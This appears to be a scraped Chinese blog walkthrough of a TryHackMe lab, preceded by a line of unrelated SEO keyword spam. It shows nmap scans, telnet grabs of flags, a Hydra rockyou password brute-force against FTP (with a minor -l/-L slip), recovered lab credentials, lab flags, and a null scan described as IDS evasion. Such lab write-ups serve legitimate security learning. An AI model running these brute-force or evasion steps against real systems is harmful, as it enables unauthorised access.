三亚房地产网站制作,网片焊接,网络营销的一般流程,WordPress反爬虫教程本文相关的TryHackMe实验房间链接#xff1a;TryHackMe | Why Subscribe
nmap nmap -T5 -p- 10.10.90.32 -T5 扫描速度 -p- 全端口扫描 答题#xff1a; 这题叫我们找藏在http服务下的flag#xff0c;根据上面扫出来的端口#xff0c;所以我们开始搞80 这里简单介绍一下…
本文相关的TryHackMe实验房间链接TryHackMe | Why Subscribe
nmap nmap -T5 -p- 10.10.90.32 -T5 扫描速度 -p- 全端口扫描 答题 这题叫我们找藏在http服务下的flag根据上面扫出来的端口所以我们开始搞80 这里简单介绍一下telnet的用法
telnet 首先我们使用 telnet MACHINE_IP 80 连接到端口 80。 接下来我们输入GET /index.html HTTP/1.1来检索index.html页面 或者输入GET / HTTP/1.1来检索默认页面。 最后你需要为主机提供一些值例如 host: telnet 并按两次 Enter/Return 键。
telnet 10.10.90.32 80 flagTHM{web_server_25352} 输入完host: telnet记得按二次Enter键
接下来是ssh服务的端口22
telnet 10.10.90.32 22 flagTHM{946219583339} telnet 10.10.90.32 10021 答题 接下来要使用hydra
所以这也简单介绍一下hydra用法
Hydra hydra的一般语法是hydra -l username -P wordlist.txt server service每个参数的含义是 -l username: -l应该在username之前表示目标的登录login名。 -P wordlist.txt: -P在wordlist.txt文件之前该文件是一个文本文件其中包含你要尝试进行匹配的密码列表。 server是目标服务器的主机名或 IP 地址。 service表示你试图发起密码字典攻击的对应服务。
以下为一些具体示例 hydra -l mark -P /usr/share/wordlists/rockyou.txt MACHINE_IP ftp将mark用作用户名在 FTP 服务器上迭代匹配密码字典所提供的密码 hydra -l mark -P /usr/share/wordlists/rockyou.txt ftp://MACHINE_IP与上一个示例相同MACHINE_IP ftpftp://MACHINE_IP hydra -l frank -P /usr/share/wordlists/rockyou.txt MACHINE_IP ssh将用frank作用户名因为它尝试使用不同的密码通过 SSH 登录。
你还可以添加一些额外的可选参数 -s PORT为相关的服务指定非默认端口 -V或者-vV显示详细信息让 Hydra 显示正在进行尝试的用户名和密码组合。这种详细程度非常便于查看进度尤其是在你对语法没有信心的情况下 -t n 其中 n 代表与目标的并行连接数如-t 16表示将创建 16 个线程用于连接到目标 -d用于调试以获取有关正在发生的事情的更多详细信息。调试输出可以为你省去很多麻烦例如如果 Hydra 尝试连接到关闭的端口并超时如果使用了-d则会立即显示这一信息。
成功破解密码后你可以使用CTRL-C结束密码攻击过程。在实际情况下密码攻击通常需要较长的时间如果你希望 Hydra 能够实时更新密码攻击的进度选择使用详细信息选项或者调试选项会非常有用。
我们先准备一个users文件 这里重开了一次服务器所以目标ip改了
hydra -l users.txt -P /usr/share/wordlists/rockyou.txt ftp://10.10.67.99:10021 tryhackme服务器太慢了这里就直接给答案了 接下来就是登录ftp服务器
这里就不演示eddieflag不在里面
ftp 10.10.67.99
quinn
andrea
ls
get ftp_flag.txt
exit
ls
cat ftp_flag.txt flagTHM{321452667098} 答题 接下来我们先访问一下http://10.10.90.32:8080 这里要求我们使用nmap扫描并且不被目标机器的IDS发现。
为避免 IDS 警报也可以考虑使用 -T0 或 -T1
不过会很慢.........
这里使用Null扫描
nmap -sN 10.10.67.99 flagTHM{f7443f99} 答题